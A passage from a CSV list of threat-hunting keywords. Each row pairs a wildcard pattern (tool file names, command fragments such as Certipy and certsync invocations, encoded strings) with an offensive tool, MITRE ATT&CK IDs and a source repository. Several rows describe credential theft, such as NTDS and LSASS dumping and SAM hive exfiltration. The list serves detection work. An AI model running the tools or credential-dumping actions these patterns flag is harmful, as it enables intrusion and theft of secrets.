Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Certify.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*certipy account *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy auth *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy ca *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy ca -backup*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy cert *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy find *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy find *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy forge *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy forge *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy relay *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy relay -ca *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy req *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy req -username *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy shadow *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy template *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certipy-master.zip*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*CertStealer.csproj*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*CertStealer.exe*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*CertStealer.sln*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*certsync *--dc-ip*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*certsync -u *,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*certsync -u * -p *-d * -ca-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certsync_ntds_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certsync-master.zip*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*cewl --depth * --with-numbers -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*cfprefsd_race_condition*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*cGlpLmZkYS5nb3Y=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*cGlwZW5hbWU9*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*cgojmfochfikphincbhokimmmjenhhgk*,greyware_tool_keyword,Whoer VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Chachi-Enumerator.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Chachi-Enumerator.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*ChaitanyaHaritash/kimi*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*chameleon.py *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*changepasswd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*charlesnathansmith/whatlicense*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*charles-proxy*,offensive_tool_keyword,charles-proxy,A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic,T1043.002 - T1556.001 - T1573.001,TA0012 - TA0017,N/A,N/A,Sniffing & Spoofing,https://charlesproxy.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*charlotte-main.zip*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*ChatLadon.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*ChatLadon.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*check_all*.c*,offensive_tool_keyword,CheckPlease,c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*check_all*.go*,offensive_tool_keyword,CheckPlease,go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*check_all*.pl*,offensive_tool_keyword,CheckPlease,perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*check_all*.ps1*,offensive_tool_keyword,CheckPlease,ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,1,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*check_all*.py*,offensive_tool_keyword,CheckPlease,python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,1,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*check_and_write_IAT_Hook*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*check_cve-2020-1472.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1072,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WiIs0n/Zerologon_CVE-2020-1472,1,1,N/A,N/A,1,10,5,2020-10-05T07:47:02Z,2020-09-29T18:45:44Z -*check_function ntdll.dll EtwEventWrite*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*check_ppl_requirements*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*checkIfHiddenAPICall*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*Check-LocalAdminHash.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*CheckPlease*,offensive_tool_keyword,CheckPlease,This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z -*CheckPort.csproj*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*CheeseDCOM.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheeseExec.csproj*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheeseExec.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheesePS.csproj*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheesePS.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z 